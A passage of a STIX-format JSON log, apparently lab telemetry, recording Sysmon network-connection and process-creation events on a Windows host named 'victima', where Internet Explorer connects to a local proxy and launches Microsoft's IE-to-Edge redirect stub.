| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.933Z", | |
| "modified": "2022-07-28T16:05:22.933Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:41.761133302Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:35.420Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50282, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:T94kd0w0mDmCuFbNFp0E02dXcX8=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:32.744Z", | |
| "last_observed": "2022-07-27T14:26:32.744Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--38587765-0d4d-4c16-9fb9-eb5d260282ea", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.934Z", | |
| "modified": "2022-07-28T16:05:22.934Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:41.761725443Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:35.420Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50283, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:eUhE1CFyqbHqPb8x+l5gaUsha7c=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:32.832Z", | |
| "last_observed": "2022-07-27T14:26:32.832Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--75926175-6429-4afc-b670-0eec321fddaa", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.934Z", | |
| "modified": "2022-07-28T16:05:22.934Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:41.762306082Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:35.420Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50284, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:X1vW06vDurcJb8S3qPYv9XUncSw=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:33.486Z", | |
| "last_observed": "2022-07-27T14:26:33.486Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--9dad3987-aede-4b47-97b9-75182f297d0d", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.934Z", | |
| "modified": "2022-07-28T16:05:22.934Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:42.787671505Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:36.436Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50285, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:S8hYSKZXCMGsz9VYz5JoIRPmxw8=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:34.568Z", | |
| "last_observed": "2022-07-27T14:26:34.568Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--bda88fac-1304-4b03-b38e-489237d51a99", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.935Z", | |
| "modified": "2022-07-28T16:05:22.935Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:48.479620509Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:42.160Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50288, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:JWdb6iHfg0Kekcm8HoNdU9AkXRU=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:40.332Z", | |
| "last_observed": "2022-07-27T14:26:40.332Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--9063ccbf-aa89-4864-8596-49b65f31a774", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.935Z", | |
| "modified": "2022-07-28T16:05:22.935Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:49.536624998Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:43.199Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50289, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:47SZjGwkm9Ankpd9FH3SjkvNfSk=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:40.549Z", | |
| "last_observed": "2022-07-27T14:26:40.549Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--8f7e54b0-b521-4f40-8c42-a77fcccedcbc", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.935Z", | |
| "modified": "2022-07-28T16:05:22.935Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE", | |
| "SCODEF:6492", | |
| "CREDAT:9474", | |
| "/prefetch:2" | |
| ], | |
| "parent_args_count": 4, | |
| "parent_entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b25-62e1-1002-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE\" SCODEF:6492 CREDAT:9474 /prefetch:2" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 1852, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=1 --customer-type=1 -- \"http://cnn.com/\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:54.010962183Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:47.674Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE", | |
| "SCODEF:6492", | |
| "CREDAT:9474", | |
| "/prefetch:2" | |
| ], | |
| "parent_args_count": 4, | |
| "parent_entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b25-62e1-1002-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:45.655Z", | |
| "last_observed": "2022-07-27T14:26:45.655Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--db28d684-9f49-488a-981c-d34eb15811db", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.936Z", | |
| "modified": "2022-07-28T16:05:22.936Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args_count": 2, | |
| "parent_entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b25-62e1-1102-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 6492, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" http://www.ibm.com/" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 5380, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=1 --customer-type=1 -- \"http://cnn.com/\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:54.013125779Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:47.674Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\Internet Explorer" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args_count": 2, | |
| "parent_entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b25-62e1-1102-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:45.667Z", | |
| "last_observed": "2022-07-27T14:26:45.667Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--db93d912-52b5-4938-b1ce-f8e4f437b9a5", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.936Z", | |
